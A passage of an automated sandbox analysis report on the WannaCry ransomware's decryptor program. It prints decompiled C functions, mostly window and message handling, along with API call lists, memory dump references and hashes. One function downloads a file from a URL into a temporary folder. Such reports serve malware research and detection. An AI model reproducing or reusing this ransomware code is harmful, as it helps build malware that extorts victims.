                                                      • API ID: MessageSend$#2379#4853KillTimer
                                                      • String ID:
                                                      • API String ID: 178170520-0
                                                      • Opcode ID: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                                      • Instruction ID: aacaf11b8525f3fa08346ebc997e4185e7a595c9bc7dc659aa73715d177cc548
                                                      • Opcode Fuzzy Hash: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                                      • Instruction Fuzzy Hash: FD114475340B00ABD6709A74CD41F6BB3D4BB94B10F20892DF395FB2D0DAB4B8068B58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403860 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43windowthreadCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E00403860(void* __ecx) {
				int _t6;
				long _t7;
				void* _t9;
				void* _t14;

				_t14 = __ecx;
				_t6 = SendMessageA( *(__ecx + 0xc0), 0x147, 0, 0);
				_push(0);
				if(_t6 != 0xffffffff) {
					_t7 = SendMessageA( *(_t14 + 0xc0), 0x150, _t6, ??);
					if(_t7 != 0) {
						SendMessageA( *(_t14 + 0x80), 0x1009, 0, 0);
						_t9 = CreateThread(0, 0, E004038E0, _t14, 0, 0);
						 *(_t14 + 0xf4) = _t9;
						return _t9;
					}
					return _t7;
				} else {
					_push(0);
					_push("Please select a host to decrypt.");
					L00412CC8();
					return _t6;
				}
			}







                                                      0x00403861
                                                      0x0040387a
                                                      0x0040387f
                                                      0x00403881
                                                      0x0040389f
                                                      0x004038a3
                                                      0x004038b5
                                                      0x004038c5
                                                      0x004038cb
                                                      0x00000000
                                                      0x004038cb
                                                      0x004038d3
                                                      0x00403883
                                                      0x00403883
                                                      0x00403885
                                                      0x0040388a
                                                      0x00403891
                                                      0x00403891

                                                      APIs
                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
                                                      • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
                                                      • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
                                                      • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
                                                      Strings
                                                      • Please select a host to decrypt., xrefs: 00403885
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#1200CreateThread
                                                      • String ID: Please select a host to decrypt.
                                                      • API String ID: 3616405048-3459725315
                                                      • Opcode ID: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                                      • Instruction ID: 64f0ddf58892c59834d5d68b98c76a24f926c69eeefbcfa1eb30c508a9047c0d
                                                      • Opcode Fuzzy Hash: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                                      • Instruction Fuzzy Hash: C4F09032380700BAF2306775AC07FEB2698ABC4F21F25462AF718BA2C0C5F478018668
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004044C0 Relevance: 10.5, APIs: 7, Instructions: 38windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 81%
                                                      			E004044C0(void* __ecx, long _a4) {
				struct tagLOGFONTA _v72;
				long _t10;
				struct HFONT__* _t13;
				struct HWND__* _t15;
				void* _t21;

				_t10 = _a4;
				_t21 = __ecx;
				if(_t10 != 0) {
					L2:
					GetObjectA( *(_t10 + 4), 0x3c,  &(_v72.lfOrientation));
					_v72.lfUnderline = 1;
					_t13 = CreateFontIndirectA( &_v72);
					_push(_t13);
					L00412D5E();
					 *((char*)(_t21 + 0x58)) = 1;
					return _t13;
				}
				_t15 = GetParent( *(__ecx + 0x20));
				_push(_t15);
				L00412DAC();
				_t10 = SendMessageA( *(_t15 + 0x20), 0x31, 0, 0);
				_push(_t10);
				L00412DE2();
				if(_t10 != 0) {
					goto L2;
				}
				return _t10;
			}








                                                      0x004044c0
                                                      0x004044ca
                                                      0x004044cc
                                                      0x004044f8
                                                      0x00404503
                                                      0x0040450d
                                                      0x00404513
                                                      0x00404519
                                                      0x0040451d
                                                      0x00404522
                                                      0x00000000
                                                      0x00404522
                                                      0x004044d2
                                                      0x004044d8
                                                      0x004044d9
                                                      0x004044e8
                                                      0x004044ee
                                                      0x004044ef
                                                      0x004044f6
                                                      0x00000000
                                                      0x00000000
                                                      0x0040452a

                                                      APIs
                                                      • GetParent.USER32(?), ref: 004044D2
                                                      • #2864.MFC42(00000000), ref: 004044D9
                                                      • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                                      • #2860.MFC42(00000000), ref: 004044EF
                                                      • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                                      • CreateFontIndirectA.GDI32(?), ref: 00404513
                                                      • #1641.MFC42(00000000), ref: 0040451D
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1641#2860#2864CreateFontIndirectMessageObjectParentSend
                                                      • String ID:
                                                      • API String ID: 2724197214-0
                                                      • Opcode ID: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                                      • Instruction ID: 8763edc8e5a6adeaffa7a86524b671660dad1b09e215c7e2bee76a425fbc91e9
                                                      • Opcode Fuzzy Hash: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                                      • Instruction Fuzzy Hash: 5AF0A4B1100340AFD720EB74DE49FDB7BA86F94304F04891DB649DB1A1DAB4E944C769
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040C060 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E0040C060(void* __ecx, void* __eflags) {
				void* _t35;
				int _t45;
				struct HWND__* _t56;
				signed int _t58;
				int _t59;
				struct HWND__* _t87;
				intOrPtr _t92;
				void* _t93;

				_push(0xffffffff);
				_push(E004142BB);
				 *[fs:0x0] = _t92;
				E00413060(0x2408, __ecx,  *[fs:0x0]);
				_push(_t58);
				E0040DBB0(_t92 + 0x18, 0x1000);
				 *(_t92 + 0x241c) = 0;
				_push(_t92 + 0x14);
				_t59 = _t58 | 0xffffffff;
				_t35 = E0040BED0( *((intOrPtr*)(_t92 + 0x2424)),  *((intOrPtr*)(_t92 + 0x2428)), 0xb);
				_t93 = _t92 + 0x10;
				if(_t35 == 0) {
					_t87 =  *(_t93 + 0x2430);
					if(_t87 != 0) {
						SendMessageA(_t87, 0x4e20, 0, 0);
					}
					E0040DD00(_t93 + 0x1c,  *((intOrPtr*)(_t93 + 0x242c)));
					_push(0);
					_push(E0040DD40(_t93 + 0x1c));
					_push(E0040DD30(_t93 + 0x20));
					_push(7);
					if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x18))() >= 0) {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0, 0);
						}
						_push(_t93 + 0x10);
						_push(_t93 + 0x102c);
						 *((intOrPtr*)(_t93 + 0x18)) = 0x13ec;
						_push(_t93 + 0x17);
						if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x1c))() >= 0) {
							if( *((char*)(_t93 + 0xf)) == 7) {
								_t59 = 0;
							}
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, _t59, 0);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							goto L21;
						} else {
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, 0xffffffff, 0);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
						}
					} else {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0xffffffff, 0);
						}
						 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
						 *(_t93 + 0x241c) = 0xffffffff;
						_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
					}
				} else {
					_t56 =  *(_t93 + 0x2430);
					if(_t56 != 0) {
						SendMessageA(_t56, 0x4e20, _t59, 0);
					}
					 *(_t93 + 0x241c) = _t59;
					L21:
					E0040DBF0(_t93 + 0x14);
					_t45 = _t59;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t93 + 0x2414));
				return _t45;
			}











                                                      0x0040c066
                                                      0x0040c068
                                                      0x0040c073
                                                      0x0040c07a
                                                      0x0040c07f
                                                      0x0040c08b
                                                      0x0040c0a2
                                                      0x0040c0ad
                                                      0x0040c0b2
                                                      0x0040c0b5
                                                      0x0040c0ba
                                                      0x0040c0bf
                                                      0x0040c0e7
                                                      0x0040c0f6
                                                      0x0040c102
                                                      0x0040c102
                                                      0x0040c111
                                                      0x0040c11c
                                                      0x0040c129
                                                      0x0040c139
                                                      0x0040c13a
                                                      0x0040c142
                                                      0x0040c17d
                                                      0x0040c189
                                                      0x0040c189
                                                      0x0040c195
                                                      0x0040c19d
                                                      0x0040c19e
                                                      0x0040c1ac
                                                      0x0040c1b2
                                                      0x0040c1ed
                                                      0x0040c1ef
                                                      0x0040c1ef
                                                      0x0040c1f3
                                                      0x0040c1fe
                                                      0x0040c1fe
                                                      0x0040c208
                                                      0x0040c20b
                                                      0x00000000
                                                      0x0040c1b4
                                                      0x0040c1b6
                                                      0x0040c1c2
                                                      0x0040c1c2
                                                      0x0040c1cc
                                                      0x0040c1d3
                                                      0x0040c1e3
                                                      0x0040c1e3
                                                      0x0040c144
                                                      0x0040c146
                                                      0x0040c152
                                                      0x0040c152
                                                      0x0040c15c
                                                      0x0040c163
                                                      0x0040c173
                                                      0x0040c173
                                                      0x0040c0c1
                                                      0x0040c0c1
                                                      0x0040c0ca
                                                      0x0040c0d5
                                                      0x0040c0d5
                                                      0x0040c0db
                                                      0x0040c216
                                                      0x0040c21a
                                                      0x0040c21f
                                                      0x0040c21f
                                                      0x0040c22b
                                                      0x0040c238

                                                      APIs
                                                        • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
                                                      • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
                                                      • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
                                                      • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
                                                      • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#823
                                                      • String ID:
                                                      • API String ID: 3019263841-0
                                                      • Opcode ID: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                                      • Instruction ID: af0acaa543f5011fd428c8da5e8f88cfa40878c60dbd15804793c53c70a14286
                                                      • Opcode Fuzzy Hash: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                                      • Instruction Fuzzy Hash: 4A41B570644341EBD220DF65CC85F5BB7A8BF84724F104B2DF5247B2D1C7B4A9098BAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409C20 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E00409C20(signed int __eax, intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v0;
				char _v4;
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _t29;
				intOrPtr _t31;
				long _t36;
				intOrPtr _t38;
				intOrPtr* _t41;
				struct HWND__* _t47;
				intOrPtr _t48;
				long _t53;
				struct HWND__* _t58;
				signed int _t60;
				intOrPtr* _t67;
				signed int _t68;

				_t67 = __ecx;
				L00412FE6();
				_t68 = __eax;
				if((__eax & 0x00008000) != 0) {
					_push( &_v8);
					_push( &_v4);
					L00412FFE();
					if(_a4 == 0) {
						_t60 = _v0;
						_t41 = _v16;
					} else {
						_t58 =  *(__ecx + 0x20);
						_t36 = SendMessageA(_t58, 0x408, 0, 0);
						_t41 = _v16;
						_t53 = _t36;
						if(_t53 == _t41) {
							_t38 =  *((intOrPtr*)(_t67 + 0x68));
							_t58 =  *(_t67 + 0x6c);
							if(_t53 - _t38 < _t58) {
								_t53 = _t58 + _t38;
							}
						}
						asm("cdq");
						_t60 = (_v0 ^ _t58) - _t58 + _t53;
					}
					_t47 =  *(_t67 + 0x6c);
					_t29 = _t47 + _t41;
					if(_t60 <= _t29) {
						if(_t60 >= _t41) {
							InvalidateRect( *(_t67 + 0x20), 0, 1);
						}
					} else {
						_t60 = _t60 + _v12 - _t47 - _t41;
						if(_t60 > _t29) {
							_t60 = _t29;
						}
						_push(0);
						if((_t68 & 0x00004000) == 0) {
							_push(0x4000);
							_push(0);
							L00412DDC();
						} else {
							_push(0);
							_push(0x4000);
							L00412DDC();
						}
					}
					_t48 = _v12;
					_t31 = _t60 -  *(_t67 + 0x6c);
					 *((intOrPtr*)(_t67 + 0x68)) = _t31;
					if(_t31 < _t48) {
						 *((intOrPtr*)(_t67 + 0x68)) = _t48;
					}
					 *_v16 =  *((intOrPtr*)( *_t67 + 0xa8))(0x402, _t60, 0);
					return 1;
				} else {
					return 0;
				}
			}




















                                                      0x00409c25
                                                      0x00409c27
                                                      0x00409c2c
                                                      0x00409c34
                                                      0x00409c4a
                                                      0x00409c4b
                                                      0x00409c4e
                                                      0x00409c59
                                                      0x00409c98
                                                      0x00409c9c
                                                      0x00409c5b
                                                      0x00409c5b
                                                      0x00409c68
                                                      0x00409c6e
                                                      0x00409c72
                                                      0x00409c76
                                                      0x00409c78
                                                      0x00409c7b
                                                      0x00409c84
                                                      0x00409c86
                                                      0x00409c86
                                                      0x00409c84
                                                      0x00409c8d
                                                      0x00409c94
                                                      0x00409c94
                                                      0x00409ca0
                                                      0x00409ca3
                                                      0x00409ca8
                                                      0x00409ce6
                                                      0x00409cf0
                                                      0x00409cf0
                                                      0x00409caa
                                                      0x00409cb2
                                                      0x00409cb6
                                                      0x00409cb8
                                                      0x00409cb8
                                                      0x00409cc0
                                                      0x00409cc2
                                                      0x00409cd4
                                                      0x00409cd9
                                                      0x00409cdd
                                                      0x00409cc4
                                                      0x00409cc4
                                                      0x00409cc6
                                                      0x00409ccd
                                                      0x00409ccd
                                                      0x00409cc2
                                                      0x00409cf9
                                                      0x00409cff
                                                      0x00409d03
                                                      0x00409d06
                                                      0x00409d08
                                                      0x00409d08
                                                      0x00409d24
                                                      0x00409d2f
                                                      0x00409c37
                                                      0x00409c3d
                                                      0x00409c3d

                                                      APIs
                                                      • #3797.MFC42 ref: 00409C27
                                                      • #6734.MFC42(?,?), ref: 00409C4E
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
                                                      • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3797#4284#6734MessageSend
                                                      • String ID:
                                                      • API String ID: 1776784669-0
                                                      • Opcode ID: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                                      • Instruction ID: 0f06e6a1ab2a1e1858972f557de936d8f63d8015e647da1bd90f7003a846fc2f
                                                      • Opcode Fuzzy Hash: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                                      • Instruction Fuzzy Hash: 2F31B0727447019BE724DE28DD81B6B73E1ABC8700F10493EFA86A73C1DA78EC468759
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004127E0 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E004127E0(signed int __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v4;
				intOrPtr* _v16;
				intOrPtr _v24;
				void* __ebx;
				intOrPtr* _t21;
				intOrPtr* _t23;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t33;
				signed int _t42;
				unsigned int _t44;
				signed int _t45;
				void* _t53;
				intOrPtr _t65;
				void* _t67;
				intOrPtr _t68;
				void* _t69;

				_push(0xffffffff);
				_push(E0041438B);
				_t21 =  *[fs:0x0];
				_push(_t21);
				 *[fs:0x0] = _t68;
				_push(__ecx);
				_push(0x244);
				L00412CEC();
				_t33 = _t21;
				_t69 = _t68 + 4;
				_v16 = _t33;
				_t53 = 0;
				_v4 = 0;
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					_t65 = _a16;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x134)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x138)) = 0;
					 *((intOrPtr*)(_t33 + 0x13c)) = 0;
					if(_t65 != 0) {
						asm("repne scasb");
						_t42 =  !(__ecx | 0xffffffff);
						_push(_t42);
						L00412CEC();
						 *((intOrPtr*)(_t33 + 0x138)) = 0;
						asm("repne scasb");
						_t44 =  !(_t42 | 0xffffffff);
						_t67 = _t65 - _t44;
						_t45 = _t44 >> 2;
						memcpy(_t67 + _t45 + _t45, _t67, memcpy(0, _t67, _t45 << 2) & 0x00000003);
						_t69 = _t69 + 0x1c;
						_t53 = 0;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_v4 = 0xffffffff;
				_t23 = E00411C00(_t33);
				 *0x4220dc = _t23;
				if(_t23 == _t53) {
					_push(8);
					L00412CEC();
					 *_t23 = 1;
					 *((intOrPtr*)(_t23 + 4)) = _t33;
					 *[fs:0x0] = _v24;
					return _t23;
				} else {
					if(_t33 != _t53) {
						_t25 =  *((intOrPtr*)(_t33 + 0x138));
						if(_t25 != _t53) {
							_push(_t25);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_t26 =  *((intOrPtr*)(_t33 + 0x13c));
						 *((intOrPtr*)(_t33 + 0x138)) = _t53;
						if(_t26 != _t53) {
							_push(_t26);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_push(_t33);
						 *((intOrPtr*)(_t33 + 0x13c)) = _t53;
						L00412C98();
						_t69 = _t69 + 4;
					}
					 *[fs:0x0] = _v24;
					return 0;
				}
			}




















                                                      0x004127e0
                                                      0x004127e2
                                                      0x004127e7
                                                      0x004127ed
                                                      0x004127ee
                                                      0x004127f5
                                                      0x004127f8
                                                      0x004127fd
                                                      0x00412802
                                                      0x00412804
                                                      0x00412807
                                                      0x0041280b
                                                      0x0041280f
                                                      0x00412813
                                                      0x0041287d
                                                      0x00412815
                                                      0x00412816
                                                      0x0041281c
                                                      0x0041281e
                                                      0x00412825
                                                      0x0041282f
                                                      0x00412835
                                                      0x0041283b
                                                      0x00412844
                                                      0x00412846
                                                      0x00412848
                                                      0x00412849
                                                      0x0041285a
                                                      0x00412860
                                                      0x00412862
                                                      0x00412868
                                                      0x0041286c
                                                      0x00412876
                                                      0x00412876
                                                      0x00412878
                                                      0x00412878
                                                      0x0041287a
                                                      0x0041288b
                                                      0x0041288c
                                                      0x0041288d
                                                      0x00412890
                                                      0x00412898
                                                      0x0041289f
                                                      0x004128a4
                                                      0x004128f8
                                                      0x004128fa
                                                      0x00412906
                                                      0x0041290c
                                                      0x00412911
                                                      0x0041291b
                                                      0x004128a6
                                                      0x004128a8
                                                      0x004128aa
                                                      0x004128b2
                                                      0x004128b4
                                                      0x004128b5
                                                      0x004128ba
                                                      0x004128ba
                                                      0x004128bd
                                                      0x004128c3
                                                      0x004128cb
                                                      0x004128cd
                                                      0x004128ce
                                                      0x004128d3
                                                      0x004128d3
                                                      0x004128d6
                                                      0x004128d7
                                                      0x004128dd
                                                      0x004128e2
                                                      0x004128e2
                                                      0x004128ed
                                                      0x004128f7
                                                      0x004128f7

                                                      APIs
                                                      • #823.MFC42(00000244,?,00000428,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
                                                      • #823.MFC42(?,?,?), ref: 00412849
                                                      • #825.MFC42(?), ref: 004128B5
                                                      • #825.MFC42(?), ref: 004128CE
                                                      • #825.MFC42(00000000), ref: 004128DD
                                                      • #823.MFC42(00000008), ref: 004128FA
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #823#825
                                                      • String ID:
                                                      • API String ID: 89657779-0
                                                      • Opcode ID: a8225a914fe684002f5ebb33c6b5a83bf5030d8ce9238fcdcecfe8f5a0f25a9a
                                                      • Instruction ID: dc1b5eec0fc78afcb49772100b5c76d6e8760601cde25cb5382a27e7a1041640
                                                      • Opcode Fuzzy Hash: a8225a914fe684002f5ebb33c6b5a83bf5030d8ce9238fcdcecfe8f5a0f25a9a
                                                      • Instruction Fuzzy Hash: 8631A5B16006008BDB149F2E8D8169BB6D5FBC4720F18473EF929CB3C1EBB99951C755
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B780 Relevance: 9.1, APIs: 6, Instructions: 68filenetworkCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 61%
                                                      			E0040B780(signed int __ecx, CHAR* _a4, char* _a8) {
				intOrPtr _v12;
				void _v259;
				char _v260;
				char _v264;
				char _v284;
				char _t15;
				int _t19;
				CHAR* _t25;
				signed int _t26;
				char* _t40;

				_t26 = __ecx;
				_t25 = _a4;
				CreateDirectoryA(_t25, 0);
				_t40 = _a8;
				asm("repne scasb");
				if( !(_t26 | 0xffffffff) == 1) {
					L4:
					return 0;
				} else {
					_t15 =  *0x421798; // 0x0
					_v260 = _t15;
					memset( &_v259, 0, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetTempFileNameA(_t25, "t", 0,  &_v260);
					_t19 = DeleteUrlCacheEntry(_t40);
					_push(0);
					_push(0);
					_push( &_v264);
					_push(_t40);
					_push(0);
					L004133CE();
					if(_t19 != 0 || E0040B6A0(_t25,  &_v284, _v12) == 0) {
						DeleteFileA( &_v284);
						goto L4;
					} else {
						DeleteFileA( &_v284);
						return 1;
					}
				}
			}













                                                      0x0040b780
                                                      0x0040b787
                                                      0x0040b793
                                                      0x0040b799
                                                      0x0040b7a7
                                                      0x0040b7ac
                                                      0x0040b81d
                                                      0x0040b826
                                                      0x0040b7ae
                                                      0x0040b7ae
                                                      0x0040b7b8
                                                      0x0040b7c2
                                                      0x0040b7c8
                                                      0x0040b7d3
                                                      0x0040b7d4
                                                      0x0040b7db
                                                      0x0040b7e1
                                                      0x0040b7e7
                                                      0x0040b7e9
                                                      0x0040b7ea
                                                      0x0040b7eb
                                                      0x0040b7ed
                                                      0x0040b7f4
                                                      0x0040b815
                                                      0x00000000
                                                      0x0040b827
                                                      0x0040b82c
                                                      0x0040b83d
                                                      0x0040b83d
                                                      0x0040b7f4

                                                      APIs
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000428), ref: 0040B793
                                                      • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                                      • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                                      • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B815
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B82C
                                                        • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000000,00000428), ref: 0040B6B4
                                                        • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete$CreateDirectory$CacheDownloadEntryNameTemp
                                                      • String ID:
                                                      • API String ID: 361195595-0
                                                      • Opcode ID: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                                      • Instruction ID: f6bba9489874f0a6e7d9c3b0bbe4d647d3eb1ae806ee8fe5932772f512dcd3e1
                                                      • Opcode Fuzzy Hash: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                                      • Instruction Fuzzy Hash: 24112B76100300BBE7209B60DC85FEB379CEBC4321F00C82DF659921D1DB79550987EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409A40 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00409A40(signed int* _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr* _v24;
				struct tagRECT _v40;
				intOrPtr _v56;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v88;
				intOrPtr _t34;
				void* _t35;
				void* _t53;
